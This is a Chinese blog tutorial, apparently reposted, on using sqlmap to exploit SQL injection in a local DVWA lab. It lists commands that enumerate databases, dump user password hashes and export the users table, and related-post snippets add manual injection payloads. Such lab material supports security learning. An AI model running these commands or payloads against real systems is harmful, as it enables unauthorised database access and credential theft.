初使用sqlmap对dvwa进行sql注入

最新推荐文章于 2024-05-13 10:41:08 发布
最新推荐文章于 2024-05-13 10:41:08 发布
阅读量847 收藏 3
点赞数 2
文章标签: python 数据库
原文链接:http://www.cnblogs.com/z45-1/p/10157066.html
版权

1.下载安装dvwa,可以去此处下载:http://www.dvwa.co.uk/

2.需要安装python运行环境,我使用的是python2.7,python2.7-3.0之间的应该都可以。

3.下载sqlmap包并将其解压

4.直接cmd运行sqlmap,输入sqlmap.py -h查看帮助信息

我在运行sqlmap的时候遇到了这么一个问题,就是输入sqlmap.py -[options]的时候它会报错:

后来在网上找了一下资料,用python sqlmap.py -h运行就可以了。

接下来实际操作一下:

1.SQL Injection界面输入 id为1,我们URL中可以看到这么一个GET请求:http://localhost:8098/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#(级别设置为low);

我们用URL测试之后发现它是重定向至登录页面,所以我们还需要获取一下cookie,可以使用抓包工具查看,也可以使用F12查看

获取cookie之后我们在看一下结果:

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=c6dqu79cn9gjr31elg6m7ut7p5" --batch

此处,可以看到 id就是存在可以sql注入的参数。

2.查看所有的数据库;

python sqlmap.py -u "http://localhost:8098/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=c6dqu79cn9gjr31elg6m7ut7p5" --batch --dbs(dbs为所有数据库)

3.查看当前的数据库名称:

python sqlmap.py -u "http://localhost:8098/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=c6dqu79cn9gjr31elg6m7ut7p5" --batch --current-db

4.查看数据库中的所有用户和密码:

python sqlmap.py -u "http://localhost:8098/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=c6dqu79cn9gjr31elg6m7ut7p5" --batch --users --passwords

passsword hash: 显示的哈希密码, clear_text password: 显示的明文密码

5.查看数据里的所有表

python sqlmap.py -u "http://localhost:8098/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=c6dqu79cn9gjr31elg6m7ut7p5" --batch -D dvwa --tables  

-D dvwa 是选择数据库

6.查看表中的数据:

python sqlmap.py -u "http://localhost:8098/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=c6dqu79cn9gjr31elg6m7ut7p5" --batch -D dvwa -T users --columns

-T选择数据表

7.将表中的数据进行到处并保存

python sqlmap.py -u "http://localhost:8098/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=c6dqu79cn9gjr31elg6m7ut7p5" --batch -D dvwa -T users -C "user,password" --dump

 

 

 

 

 

 

 

 

 

转载于:https://www.cnblogs.com/z45-1/p/10157066.html

anma5413
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Sqlmapdvwa进行sql注入测试(级阶段)
fanxindong0620的博客
11-07 3389
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
使用Sqlmap对目标站点进行渗透攻击
weixin_53897304的博客
06-13 1851
掌握Kali Linux中的Sqlmap各类功能及参数配置 技能目标:使用Sqlmap对目标站点进行渗透攻击
SQLMAP注入DVWA实战
m0_62636343的博客
05-12 2147
SQLMAP注入DVWA
sqlmap快速上手教程
weixin_34138377的博客
10-31 305
为什么80%的码农都做不了架构师?>>> ...
【渗透测试】 sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap
最新发布
2401_84968269的博客
05-13 871
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
sqlmapdvwa进行sql注入
weixin_52971422的博客
04-01 4751
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
kali之使用sqlmap进行sql注入
weixin_34284188的博客
06-14 2705
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆...
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
学习之sql注入漏洞网址的创建
06-06
在IT安全领域,SQL注入是一种常见的攻击手段,它利用了应用程序对用户输入处理不当的漏洞。这篇文章的主题是“学习之sql注入漏洞网址的创建”,它旨在帮助学者或研究人员建立一个自定义的环境来模拟SQL注入攻击,...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入攻击与防御 SQL 注入是一种常见的 Web 应用安全漏洞...为了防御 SQL 注入攻击,需要对用户输入进行严格的验证,使用 Prepared Statement 和参数化查询,定期备份数据库,并使用 SQL 注入检测工具来检测漏洞。
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
在这个实验中,我们将深入理解SQL注入的盲注类型,并学习如何使用sqlmap工具进行自动化探测和利用。 一、SQL注入-盲注 1. 盲注的基本原理是通过观察应用程序的响应时间或者返回结果的微妙变化来判断SQL查询的结果...
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1771
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
2018-10 第一次DVWA靶机爆破SQL注入漏洞记录(GET方法,使用SQLMAP、任意抓包工具)
昨天今天下雨天的博客
10-29 2353
首先进入DVWA,调整安全级别为low。 打开SQL Injection页面,ID栏输入1 因为DVWA需要登录,所以使用Burp Suite抓包,包里包含了cookie。 将抓包内容保存至本地(/root/test) 打开终端,输入: sqlmap -r /root/test --current-db   ,根据包里的内容猜解当前数据库,可以不加--current-db以...
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏
1、渗透之利用sqlmapdvwa进行sql注入
tzyyy1的博客
02-28 7156
测试环境:dvwa+Kail 1、寻找注入点:http://192.168.43.75/dvwa/vulnerabilities/sqli/ 1.2、注入点步测试: 1' union select user, password from users# 1.3、继续测试:1'or'1'='1 2、使用Kail工具测试: sqlmap -u http://192.168.43....
DVWA之LOW级别SQL注入---SQLMap使用
weixin_42465260的博客
08-05 7834
看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。 SQLMapdvwa简单使用实例: 一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回 ID: 1 First name: admin Surname: admin 返回正常; 再次输入1',报错,返回 You have an error in your SQL syntax...
使用SQLmapdvwa进行SQL注入测试
yusakul的博客
11-19 3238
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏览器调试,输入user id并submit...
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmapDVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值